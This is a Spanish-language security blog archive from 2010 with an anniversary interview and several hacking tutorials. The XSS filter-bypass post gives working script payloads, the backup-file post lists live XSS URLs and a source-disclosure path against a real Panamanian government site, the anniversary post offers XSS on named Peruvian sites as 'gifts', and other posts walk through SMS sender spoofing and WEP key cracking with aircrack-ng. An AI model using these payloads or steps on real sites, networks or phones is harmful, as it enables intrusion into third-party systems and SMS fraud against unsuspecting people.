lunes 31 de mayo de 2010

Entrevista a Dr. White por aniversario de Seguridad-Blanca

Muy bien a raíz de el aniversario de seguridad blanca que cumple un año

 Decidí hacerle una entrevista a Camilo Galdos AKA Dr. White, el administrador del blog.

 que tal Camilo?

   -chere

Dime Camilo como nace el proyecto de seguridad blanca?

Tenía ganas de compartir mi conocimiento conforme iba aprendiendo ya que veía que en los foros se repetía la información y no salían de Sqli, RFI y LFI; yo quería un lugar donde encontrar info mas allá de seguridad web así que me puse a leer y tratar de recopilar todo en un mismo lugar lo que llame SeguridadBlanca

Antes de seguridad blanca tuviste otros proyectos  similares

No, solo leía foros, en algún momento intenté iniciar con otro blog pero no me dieron los ánimos para seguir.

Al iniciar seguridad blanca pensaste que se convertiría en uno de los blog de seguridad informática mas populares de la red

Sinceramente no lo considero de los más populares de la red, lo considero pequeño sin intentar ser modesto pero si tengo los ánimos de que se haga conocido como otros que sigo, sin embargo pienso que no está tan mal para estar cumpliendo un año hoy día y cuando lo inicie la verdad tenía simplemente hacerlo como una biblioteca que visitara quien estuviera interesado y admito haberme sentido mal por tener tan pocos lectores en un principio porque sentía que todo lo hacía en vano pero mi recompensa eran los comentarios que decía Gracias Dr.White

 

 Como elegiste el nombre  (seguridad blanca)

Antes al igual que la mayoría andaba en el Black Hat y pues fue cuando decidí cambiar todo y ponerle Blanca como un cambio de Black a White Hat y Seguridad porque ya no quería ser un "hacker" sino alguien que sepa sobre seguridad... creo que eso fue...

Como conseguiste el dinero para el dominio  XD

jajajaja bueno... estaba en aprietos no es fácil decirle papa préstame plata pa mi dominio y hosting pues como la mayoría sabe dependo aun de mis viejos... entonces pedí dólares en mi salón de colegio dije un dólar para mi dominio plz un dólar para mi dominio plz y llegue a la suma querida y compre un mal dominio sin CNAME jajaja bueno y luego transferí con el dinero que me sobro...

Consideras a seguridad blanca más que un blog?

Pucha para mi... es un hijo... lo he visitado todos los días desde su creación... y ahora que cumple un año me siento muy muy orgulloso, cuando recién lo cree decía llegaré al año?... y casi se me derrumba por un ataque pero un pata me ayudo con lo moral y no me dejo abandonar el proyecto

Que tipos de ataque a sufrido seguridad blanca

Al poco tiempo de creada un ataque pobre me mandaron un mail falso desde blogger... queriendo que restablezca mi contraseña... y bueno, el otro fue por parte de uno de mis mejores amigos JBYTE a quien invite como escritor y la invitación no venció... entonces podía escribir cuando quisiera y me cambiaba el índex, me dolió mucho ya que lo consideraba mi amigo pero luego arreglamos las diferencias y admito el me ha ayudado mucho en lo que se refiere a seguridad informática.

Cuantos cambios o evoluciones a sufrido seguridad blanca  y cuales son

Bueno al principio no ponía tantos tutoriales propios sino que recopilaba luego cambie de theme y decidí poner algunos de mis códigos de programas y tutoriales pequeños, luego comenzó a poner más tutoriales luego compre el dominio y cambie de theme de nuevo y es como ahora es tutoriales y mas tutoriales los cuales me he esmerado en escribir y a veces he contado con ayuda como la que tengo ahora la cual aprecio mucho... Dr.Neox mi brother 

Gracias XDD

 Dime qué beneficios personales te a traído el blog, te ha ayudado a hacerte conocido en el mundo de la sec.  Informática

bueno básicamente me ha traído algunas propuestas de trabajo de algunas empresas extranjeras y peruanas, me abrió las puertas para dar charlas en el curso OSEH y muchos más, por ahora no económicos ya que no fue un proyecto para ganar dinero aun que ciertamente creo que tendré que poner algún servicio ya que toca pagar el dominio pronto...

hahaha

 Dime haz conocido personas por tu blog

Walter Cuestas de Open-Sec, Martin Lengua Olivares Administrador de CholoHack, puchas bastante gente pero a ellos dos personalmente y a través de ellos a más gente...

has ganado enemigos en seguridad blanca por motivos de envidia u otra cosa

la verdad si, más de uno me ha dicho que soy un creído pero la verdad no tienen idea, los que realmente me conocen saben que yo no soy creído y que por el contrario me gusta compartir mi conocimiento... por eso abrí mi blog... no por hacerme conocido...y bueno no quiero dar nombres porque no es ético

Tienes otros proyectos en mente¿?

Bueno por ahora quiero sacar adelante a SeguridadBlanca y tengo en mente el hacer un software que de hecho ya lo estoy programando el cual nos ayudará con mi técnica favorita el Xss   no quiero dar más detalles pero en un tiempo saldrá mi tool... ya que no tengo tanto tiempo para programar por el colegio...

Algo más que quisieras agregar?

Si quiero agregar saludos a la gente que ha colaborado con SeguridadBlanca... Dr.Neox, D4rkd3m0n, Jbyte, Perverths0, Backtracker, Martini, Wcuestas, Chelano, Zero_Bits, Vit0y4, Sebastián Burgos Mis Lectores y pucha si me olvido de alguien créanme que los tengo en mente... pero ahora se me han pasado.

 

Un saludo Dr. White y siga para adelante

Feliz Cumpleaños SeguridadBlanca!!!!


[denle click para verla mejor]



No se como empezar esta entrada, Para mi SeguridadBlanca es como mi hijo/a simplemente quiero agradecer a todos los que me apoyaron en este proyecto, y quiero aprovechar para decirles todos los proyectos que tengo en mente para este año:

- Seguir Poniendo Tutoriales ;)

- Poner mas escritores capacitados para extendernos mas haya de Seguridad Informática...

- Tengo Dos ideas de Software a desarrollar en mente, la información de uno de ellos saldrá la próxima.

- Conseguir acercarme cada ves mas a blogs de habla hispana mas grandes, no menciono nombres porque ya se sabe cuales son.


Bueno con esto y 3 Xss de Regalo (no defaces solo Xss con un poco de javascript...)

Xss Peru.com

Xss 24Horas.com.pe

Xss Tuentrada.com.pe


Ahora si... otra ves un super agradecimiento a todos quienes me han apoyado con seguridadblanca haya sido con una cachetada diciendome que mi blog es pésimo o haya sido alagandome diciendome que mi blog es bueno.... muchas gracias a todos... y espero que cumplamos muchos mas juntos!!!


Un Regalito de $400...





Saludos
Dr.White

domingo 30 de mayo de 2010

ByPass Magic_Quotes_gpc to Xss

Bueno, un poco de tiempo libre después de estudiar para mi examen de literatura me hicieron pensar en los Xss...lo sé es absurdo pero necesitaba introducción...

Bueno resulta que hay veces que uno ve una variable asi:

http://www.webvuln.com/busqueda.php?palabra=

que tentador... un buscador... lo primero que pienso yo al ver un buscador es... google... pero aparte... XSS... asi que vamos a intentar explotarlo...

vamos a buscar:

"hola"

si nos aparece el texto exacto estamos hechos... por que de hecho es vulnerable... pero que pasó... miren lo que nos voto...

\"hola\"

entonces lo que se me viene a la mente son dos cosas... hay un filtro... y el filtro puede ser Magic_Quotes_gpc() entonces... vamos a intentar bypassearlo de una manera muy sencilla que si tienen el hackbar todo es mas sencillo pero sino pues miren... esto se bypassea muy facil... podríamos usar:

http://www.webvuln.com/busqueda.php?palabra="><script>alert("Dr.Neox & Dr.White")</script>

pero no nos va a dejar pes por que hay " nos va a chantar los \ asi que vamos a usar el HACKBAR... ponemos la URL con el boton Load URL luego ponemos Split URL y ya tenemos nuestra variable solita... ahora damos click donde está la variable borraos el contenido de la búsqueda y ponemos el boton XSS luego String.CharCode() luego nos va a saltar un inputbox (una cajita) y escribimos ahí lo que queremos... por ejemplo... en mi caso pondré alert("Dr.Neox & Dr.White")... ahora si... ponemos enter y voila...

String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 68, 114, 46, 78, 101, 111, 120, 32, 38, 32, 68, 114, 46, 87, 104, 105, 116, 101, 34, 41)

ahora en nuestra búsqueda pondremos lo siguiente y estamos listos...

<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 68, 114, 46, 78, 101, 111, 120, 32, 38, 32, 68, 114, 46, 87, 104, 105, 116, 101, 34, 41)</script>

y Salto nuestra cajita mágica... hemos bypasseado el filtro...

espero les guste... ya que esto es viejo sin embargo es útil en muchas ocaciones...

resultado total:

http://www.webvuln.com/busqueda.php?palabra=<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 68, 114, 46, 78, 101, 111, 120, 32, 38, 32, 68, 114, 46, 87, 104, 105, 116, 101, 34, 41)</script>


Saludos
Dr.White

sábado 29 de mayo de 2010

SMS Spoofing

Imaginemos que un día nos llega un sms de un número el cual ya está asociado a nuestro móvil, nunca dudaríamos que el mensaje viene del celular de esta persona de la cual aparece su número , total es lo mas normal .
Pero imaginemos que el mensaje no viene de ese celular si no que fue falseado por un tercero?, piensan en las grandes posibilidades que podría dar esta especie de técnica?
Desde una simple broma hasta un fraude via SMS.
Pongámonos en el caso que nos llega un sms supuesta mente desde un numero de nuestra compañía de servicio móvil indicándonos llamar a un numero especifico por que “ganamos una promoción” , esta técnica con un poco de ingeniería social se podría usar para estafar y engañar usuarios incautos con supuestas promociones o hasta para hacer spam.
Bien como funciona esto?
Sabemos que los sms no van directamente de un celular a otro si no pasan por una serie de “GATEWAYS” los cuales también pueden almacenar nuestro SMS, en conclusión los SMS no tienen nada de seguro , y peor aun desde que las infraestructuras de las compañías para mandar SMS están conectadas a internet para poder mandar SMS desde ahí , los SMS no validan siempre de que móvil vienen , esto puede ser utilizado para falsificar SMS con algunos servicios disponibles en internet y hasta gratuitos como lo son:
Lleida.NET que te da algunos créditos de demo , comencemos con este servicio:
Una vez registrado en:
http://smsmasivo.lleida.net/es/alta.html
nos llegara al correo un mail con los datos de acceso los cuales tenemos que logarlos en:
http://websms.lleida.net/

Que es la web desde donde mandaremos los sms




Escribimos los sms con código internacional es decir para Perú:
+511993210000
El + es el símbolo internacional
51 es código de Perú
1 es código de ciudad de Lima
993210000 es el numero de celular
En teléfono/s:
Escribimos el numero o los números a los que llegara el SMS.
En Remitente el numero que falsificaremos para que llegue como si fuera de el:
Las otras opciones son irrelevantes.
Y así habremos falsificado el remitente de un SMS
Denle buen uso :D


Dr. NeoX

martes 25 de mayo de 2010

Extraer metadatos de imagenes con php

¿Que aprenderemos hoy?

a saber si una foto a sido retocada, y poder ver la imagen original.

Bien los meta-datos son  Información que se guarda automáticamente al generar un archivo: .doc, .jpg,etc. y que no son visibles al ojo humano.

Esta información la genera el software que se utilizo para crear el archivo en el caso de las fotos, por ejemplo la genera el software de la cámara fotográfica ( solo si es digital ¬¬).

en el caso de las fotografiás un tipo de meta-datos son los EXIF.

bien los meta-datos EXIF contienen información importante como : fecha original, modelo de la cámara,etc. pero lo mas importante y en lo que se fijara este post es extraer el "THUMBNAIL" original.

Para los que no sabían cada vez que se modifica una imagen se guarda una copia en miniatura de la original que no se podría observar a simple vista, pero con algo de código podremos extraerlo.

ejemplo:

aquí vemos una foto trucada y a su lado el thumbnail extraido ( la foto original)


¿Como la extraemos con PHP ?

con exif_thumbnail:

eh aquí un pequeño código el cual puedes modificar:

 ------------------------------------------------------------------------

<?php


set_time_limit ( 0 );


function getmicrotime () {


$temparray = split ( " " , microtime ());


$returntime = $temparray [ 0 ]+ $temparray [ 1 ];


return $returntime ;


}


 





$maindir = "." ;


$mydir = opendir ( $maindir ) ;


$starttime = getmicrotime ();


$i = 0 ;


while( $fn = readdir ( $mydir ))


{


$startimagetime = getmicrotime ();


$ext = strtolower ( substr ( $fn , strlen ( $fn )- 3 ));


if ( $ext == "jpg" ) {


$i ++;


echo $fn . " se proceso satisfactorio<br>" ;


flush ();


 


$image = exif_thumbnail ( $fn , $width , $height , $type );


if ( $image !== false ) {


 


$handle = fopen ( $fn . "/.thumb.jpg" , 'a' );


echo "<img src='".$fn."' width='400' height='301' />";


echo "<img src='".$fn .".thumb.jpg' width='400' height='301' />";


fwrite ( $handle , $image );


} else {


echo "imagen de miniatura no disponible para: " . $fn . "<br>" ;


echo "<img src='".$fn.".thumb.jpg' width='400' height='301' />";


}


}


}


closedir ( $mydir );


$endtime = getmicrotime ();


echo "<br>Tiempo tardado " ;


print $endtime - $starttime ;


echo "<br> Imagenes procesadas: " . $i ;


 


?>




---------------------------------------------------------------------

simplemente montalo en localhost, mete las fotos en la carpeta raíz y  voilá  , podrás ver las fotos originales .

Saludos Dr. NeoX. :)



lunes 24 de mayo de 2010

Dr. NeoX presentandose

Hola que tal soy Carlos Ganoza (A.K.A.  Dr. Neox ) de Perú, y les cuento que estaré escribiendo frecuentemente por aqui ( ese es el plan), después de haber aceptado la gentil invitación de un gran amigo y colega el Dr. White ( entre Doctores nos entendemos :P), espero colaborar con algo a este grandioso blog y junto al administrador podamos sacarlo adelante, ya le dije que vuelva a lo suyo y siga escribiendo  en su blog que la gente lo aclama jaja, sin mas que decir espero que me reciban bien y les guste mis post.

Cracking WEP - BackTrack 4

Veo que hasta ahora no había puesto algo de esto... asi que ahora lo pondré...

Primer paso:

Abrir Consola...

root@bt~#

ahora escribamos lo siguiente:

cd /pentest/

luego:

cd wireless

luego:

cd aircrack-ng

ahora si estamos en el directorio ganador...


Ahora... si manos a la obra...


debe verse algo asi su consola:

root @ /pentest/wireless/aircrack-ng #

o algo parecido recuerden que mientras escribo esto solo es mi mente la que funciona no estoy nisiquiera en uina virtual machine con linux ni nada por el estilo...

ahora...

vamos a escribir lo siguiente:

airmon-ng --> root @ /pentest/wireless/aircrack-ng # airmon-ng

y nos debe mostrar algo como:

Interface Chipset y Driver o algo por el estilo... ahora verificando siempre que nuestra Wlan0 esté presente...

en el caso que no esté un airmon-ng start wlan0 bastará... ahora...

vamos a encontrar redes disponibles... usaremos el airodump...

root @ /pentest/wireless/aircrack-ng # airodump-ng wlan0

ahora cuando ya tengamos en la mira la que queremos apretamos control + c para parar la operacion de la consola...


ahora visualizen bien el BSSID y el CH copien el BSSID y escriban lo siguiente:

root @ /pentest/wireless/aircrack-ng # airodump-ng -c (ch) -w nombredelarchivo --bssid (11:22:33...)

ahora el -w nombredelarchivo es el nombre de archivo donde se guardará la información para que sea posteriormente crackeada... el ch no va entre comillas tampoco el bssid yo lo puse asi para que se identifique...


si dan enter podrán ver que hay algo que dice #data bueno eso necesitamos que esté altísimo... como 1000... pero se mueve lento no...? bueno no estoy seguro si el BT 4 trae el Aireplay asi que si no está consiganlo xD habran otra consola lleguen a la carpeta del aireplay-ng y pongan...

#aireplay-ng -1 0 -a bssid -h nuestra_macadress -e essid wlan0

si todo salio bien nos debe decir successfull o algo asi ahora ponemos esto:

#aireplay-ng -3 -b bssid -h nuestra_macadress wlan0

y ahora si les va a salir una serie de cosas que cualquiera se creería hacker jajajajaja (chiste hacker ;)) bueno ahora si si ven la anterior consola donde teniamos corriendo el airodump veremos que el DATA se ha de haber subido a 4000 o algo por ahí... bueno ahora si ya tenemos suficiente informacion... para usar nuestro aircrack-ng... abrimos otra shell y ponemos:

root @ /pentest/wireless/aircrack-ng # aircrack-ng -n 64 -b bssid nombredelarchivo-01.cap

el nombre del archivo es el que escojimos cuando pusimos a correr el airodump... y el 01 se pone por default osea el programa solo lo pone...si ponemos enter de nuevo nos veremos asi mismo matrix los hexadecimales moviendose de una manera bien "aleatoria"... y depronto...

Key Found! y nos dan un hexadecimal que le quitamos los puntos y lo ponemos como password para conectarnos y entramos....


Es fácil... solo practiquen y usen help para que puedan ejecutar variaciones... de los programas... ;)


Saludos
Dr.White

miércoles 12 de mayo de 2010

Backups & Full Source Code Disclosure

Después de no escribir un tiempo y estar de "vacaciones" gracias a un comentario de un colega, Carlos Ganoza, recordé un antiguo "bug" que se combina por configuración del servidor y editores de Texto.

Bueno... Empezemos...

Mientras Editamos Archivos en programas como GEDIT o el mismisimo OPEN-OFFICE se genera un archivo de backup...

ejemplo Open-Office:


Archivo:
TOK.ODT

Aechivo "backup":
.~lock.tok.odt#

Bueno... si nosotros abrimos el archivo de backup con un editor de textos podríamos apreciar algo como:

Camilo Dedalo White,PC-Dedalo/Camilo Dedalo,PC-Dedalo,12.05.2010 23:16,file:///C:/Users/Camilo%20Dedalo/AppData/Roaming/OpenOffice.org/3;


Es una especie de metadata que le da alguna referencia al sistema...

bueno miren lo que hemos visto en el archivo .odt es informacion importante... en un linux hubiese bastado con hacer un "nano" o el uso de algun editor para poder ver esta información... que como repito es importante... ahora... yo me pregunto... que sería si pusiera un archivo .html en ves de poner un .odt o para hacerlo mas drástico...

Un .PHP...

Usando un Editor de PHP del estilo GEDIT cuando hacemos copias de seguridad de archivos ya guardados se le agrega el Sufijo ~

Ejemplo:

Archivo:
TOK.PHP

Archivo "backup":
TOK.PHP~


Nuestro problema ahora recide no si es cualquier archivo PHP sino, el hecho es que si nuestro administrador no sabe configurar bien el Server y en si el APACHE puede ocurrir algo desastroso...

el problema con algunos otros editores inclusive que vienen por default en algunos servidores, dejan vivos los archivos del backup y si no están ocultos o sin permisos para que lo lea cualquier usuario si lo tenemos con un dominio o en un hosting que todos podamos ver (página web) entonces puede ocurrir algo como esto:


en:

http://www.website.com/ <-- c:/website/

si hacemos un ls podemos ver:

Index.php
CMD.php
home
tipo.php
Index.php~
CMD.php~
tipo.php~

¿por que?

porque el editor de textos tiene un mal funcionamiento o nosotros cometimos un error al usarlo o estamos editandolos... en ese momento...


entonces viene el Black Hat y entra a


http://website.com/Index.php y dice... asu que buena página a ver... veamos que pasa si le agrego ~ al archivo...

y como nosotros no sabemos configurar bien los web servers entonces el .php~ existe... que pasará?


nos lo muestra como texto plano...


Index.php~:

include("/template/home.html");
$nombre = $_GET['name'];

bueno ahora estamos viendo el coe de index.php a ver si ya tenemos el code... ya podemos por lo menos ver que jalan una variable nombre... que no está filtrandose... entonces se deduce que por lo menos un xss podremos sacar...


Un Ejemplo real... que va contra mis principios éticos pero quiero que se diviertan... nada de andar defaceando o jugando con el xss:

http://www.ifarhu.gob.pa/verpag.php~

http://www.ifarhu.gob.pa/verpag.php?pag="><script>alert('SeguridadBlanca.Org')</script>

http://www.ifarhu.gob.pa/verpag.php?sec="><script>alert('SeguridadBlanca.Org')</script>


y bueno dense cuenta como hay errores tan pequeños pero tan peligrosos


Podemos ver también mala configuracion en el htaccess... vemos directorios y vemos versión del servidor...

http://www.ifarhu.gob.pa/transparencia/



Espero les haya gustado ;)